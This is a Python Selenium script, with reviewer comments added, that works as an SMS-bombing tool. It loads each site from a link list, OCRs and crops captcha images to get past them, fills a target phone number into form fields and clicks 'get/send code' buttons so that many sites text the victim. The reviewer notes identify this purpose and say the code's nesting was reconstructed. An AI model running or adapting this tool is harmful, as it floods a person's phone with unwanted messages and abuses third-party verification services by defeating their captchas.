# python 3.5.0
# Drives requests through the Chrome browser.
# Requires matching versions of Chrome and chromedriver.
# Author: linyouyi
#
# NOTE(review): as written, call_link() visits every URL in a list, types a
# phone number into the page inputs, OCRs any captcha image and clicks
# "get/send code" controls; a commented-out path below contains
# "duanxinhongzha" (pinyin for "SMS bombing"). That is the shape of an
# SMS-flooding tool. This review only restores formatting and adds
# documentation -- no behavior was changed or improved. Confirm the script is
# only ever run against systems and phone numbers you own or are explicitly
# authorized to test.
#
# NOTE(review): the statement nesting below was reconstructed from a
# whitespace-collapsed copy of the file; verify it against the original.
from selenium import webdriver
# Keys provides keyboard actions (not referenced in the visible code).
from selenium.webdriver.common.keys import Keys
import threading
import time
import random
import requests
import eventlet
import _thread
from io import BytesIO
from PIL import Image
from PIL import ImageEnhance
import pytesseract
import re

# Location of the Tesseract binary used by pytesseract.
pytesseract.pytesseract.tesseract_cmd = 'D:\\Program Files\\Tesseract-OCR\\tesseract.exe'
# NOTE(review): defined here but never passed to image_to_string() in the
# visible code.
tessdata_dir_config = '--tessdata-dir "D:\\Program Files\\Tesseract-OCR\\tessdata"'


def chrome():
    '''Create and return a Chrome WebDriver instance.

    Prints a start-up message, builds ChromeOptions with "--disable-gpu"
    and launches Chrome through the hard-coded chromedriver path.
    '''
    print("启动第一个线程==============================")
    chromeOptions = webdriver.ChromeOptions()
    #chromeOptions.add_argument('user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1"')
    # NOTE(review): not a raw string; "\P", "\G", "\C", "\A" and "\c" are
    # unrecognized escapes that Python currently keeps literally but warns
    # about on newer versions.
    chrome_driver="C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe"
    #chromeOptions.add_argument("--headless")
    chromeOptions.add_argument("--disable-gpu")
    # The two commented-out lines below would disable image loading for speed.
    #prefs = {"profile.managed_default_content_settings.images":2}
    #chromeOptions.add_experimental_option("prefs",prefs)
    driver = webdriver.Chrome(chrome_options=chromeOptions,executable_path=chrome_driver)
    return driver


def read_file(filedir):
    '''Open the link file for reading and return the open file object.

    The caller is responsible for closing the returned file.
    '''
    file = open(filedir,'r')
    return file


def send_massage(filedir):
    '''Yield the lines of the link file one at a time.

    Lines are yielded exactly as read (no stripping is done here).
    NOTE(review): the file is closed only after the generator has been
    fully consumed.
    '''
    file = read_file(filedir)
    for line in file:
        # Generator: hand back one item per iteration.
        yield line
    file.close()


def binaryzation(code_image,value):
    '''Convert an image to a two-level (mode '1') image.

    code_image is converted to grayscale, passed through a contrast
    enhancer, then thresholded: gray levels below `value` map to 0 and all
    others map to 1.
    '''
    # Convert to grayscale.
    im = code_image.convert('L')
    # Contrast enhancement.
    # NOTE(review): factor 1 -- per Pillow docs this should leave the image
    # unchanged; confirm that is intended.
    im = ImageEnhance.Contrast(im)
    im = im.enhance(1)
    # Sharpness enhancement (disabled).
    #im=ImageEnhance.Sharpness(im)
    #im=im.enhance(3.0)
    # Color enhancement (disabled).
    #im=ImageEnhance.Color(im)
    #im=im.enhance(3.0)
    # Brightness enhancement (disabled).
    #im=ImageEnhance.Brightness(im)
    #im=im.enhance(2.0)
    # Build a 256-entry lookup table implementing the threshold.
    table = []
    for y in range(256):
        if y < value:
            table.append(0)
        else:
            table.append(1)
    im = im.point(table,'1')
    return im


def discern(code_img):
    '''Run OCR on a captcha image and return the recognized text.

    The image is thresholded at 127 with binaryzation(), passed to
    pytesseract, and every character matching the regex \\W is removed.
    Returns "6666" when nothing is left, and a fixed failure message when
    any exception is raised.
    NOTE(review): the bare `except` hides every error, and call_link() types
    whatever string is returned here into the page, including the failure
    message.
    '''
    try:
        im = binaryzation(code_img,127)
        code = pytesseract.image_to_string(im)
        # Intended to keep only digits and letters.
        # NOTE(review): \W also keeps "_" and non-ASCII word characters.
        code = re.sub("\W", "", code)
        if code == '':
            return "6666"
        else:
            return code
    except:
        return "识别验证码失败!!!"


def call_link(filedir):
    '''Process every link listed in the file at `filedir`.

    For each link: load the page, collect its button/span/input elements,
    screenshot and OCR any <img> whose src contains "captcha", type the OCR
    result into inputs whose id/name look like a captcha field and a fixed
    phone number into the rest, then click controls whose text suggests
    "get"/"send"/"code". The driver is quit after the last link.
    Returns None.
    '''
    driver = chrome()
    link = send_massage(filedir)
    # NOTE(review): the loop variable rebinds `link`, the generator's name.
    for link in link:
        print(link)
        try:
            # Skip the link if it takes too long.
            # NOTE(review): monkey_patch() is called on every iteration.
            eventlet.monkey_patch()
            # NOTE(review): per eventlet docs, passing False should make the
            # timeout leave the `with` block silently -- confirm.
            with eventlet.Timeout(100,False):
                # Visit the link.
                driver.get(link)
                # Wait at most 10 seconds (implicit wait).
                driver.implicitly_wait(10)
                button = driver.find_elements_by_xpath('//button')
                span = driver.find_elements_by_xpath('//span')
                inp = driver.find_elements_by_xpath('//div//input')
                # The bare string below is a disabled earlier version kept as
                # a no-op expression; it has no runtime effect.
                '''# 所有input都填上手机号码
                for aa in inp:
                    try:
                        aa.send_keys('00000000000')
                        time.sleep(random.randint(1,2))
                    except:
                        print("########")'''
                time.sleep(5)
                # Collect all image tags.
                images = driver.find_elements_by_xpath('//img')
                for img in images:
                    img_link = img.get_attribute("src")
                    if ("captcha" in img_link):
                        print(img_link)
                        # x/y position of the captcha on the page.
                        img_location = img.location
                        # Size of the captcha element.
                        img_size = img.size
                        # Screenshot of the browser view.
                        code_img = driver.get_screenshot_as_png()
                        # Save the screenshot (disabled).
                        #driver.get_screenshot_as_file('D:\\pythontest\\duanxinhongzha\\aa.png')
                        code_img = Image.open(BytesIO(code_img))
                        # Crop the screenshot down to the captcha region.
                        code_img = code_img.crop((img_location['x'],img_location['y'],int(img_location['x'] + img_size['width']),int(img_location['y'] + img_size['height'])))
                        # Enlarge the crop to twice its size.
                        code_img = code_img.resize((img_size['width'] * 2,img_size['height'] * 2))
                        #code_img.save('D:\\pythontest\\duanxinhongzha\\aa.png')
                        print("验证码所在区域大小为:", code_img.size)
                        # OCR the captcha; failures are absorbed by discern().
                        code_num = discern(code_img)
                        print(code_num)
                # Type the captcha text into inputs that look like captcha
                # fields; every other input gets the phone number.
                # NOTE(review): `code_num` is only bound if a captcha image
                # was found; the resulting NameError is swallowed below.
                for inp_num in inp:
                    try:
                        if ("captcha" in inp_num.get_attribute('id').lower() ):
                            inp_num.send_keys(code_num)
                        elif ("ode" in inp_num.get_attribute('id').lower()):
                            inp_num.send_keys(code_num)
                        elif ("captcha" in inp_num.get_attribute('name').lower()):
                            inp_num.send_keys(code_num)
                        else:
                            inp_num.send_keys('00000000000')
                        time.sleep(random.randint(1,2))
                    except:
                        print("########")
                # If the trigger is an <a> tag, find it and click it.
                try:
                    driver.find_element_by_partial_link_text("获取").click()
                except:
                    print("a标签失败")
                # If the trigger is a <button>, find it and click it.
                # NOTE(review): the loop variable rebinds `button`.
                try:
                    for button in button:
                        if ("获取" in button.text or "发送" in button.text or "码" in button.text):
                            button.click()
                except:
                    print("button失败!!!")
                # If the trigger is a <span>, find it and click it.
                try:
                    for span in span:
                        if ("获取" in span.text or "发送" in span.text or "码" in span.text):
                            span.click()
                except:
                    print("span失败!!!")
                # If the trigger is an <input>, find it and click it.
                try:
                    for inp in inp:
                        if ("获取" in inp.get_attribute("value") or "发送" in inp.get_attribute("value") or "码" in inp.get_attribute("value")):
                            inp.click()
                except:
                    print("input失败!!!")
                #driver.find_element_by_partial_link_text(str(u"获取").encode('utf-8')).send_keys(Keys.ENTER)
                #driver.find_element_by_partial_link_text('获取').find_element().click()
                print("短信发送完毕!!!!")
                time.sleep(5)
        except:
            print("获取文本失败!!!")
    driver.quit()


if __name__ == '__main__':
    #t1 = threading.Thread(target=query_register)
    #t2 = threading.Thread(target=button)
    # NOTE(review): call_link(...) is invoked right here, in the main thread;
    # its return value (None) becomes the thread target, so t3.start() starts
    # a thread that does nothing.
    t3 = threading.Thread(target=call_link('D:\pythontest\lianjie1.txt'))
    #t1.start()
    #t2.start()
    t3.start()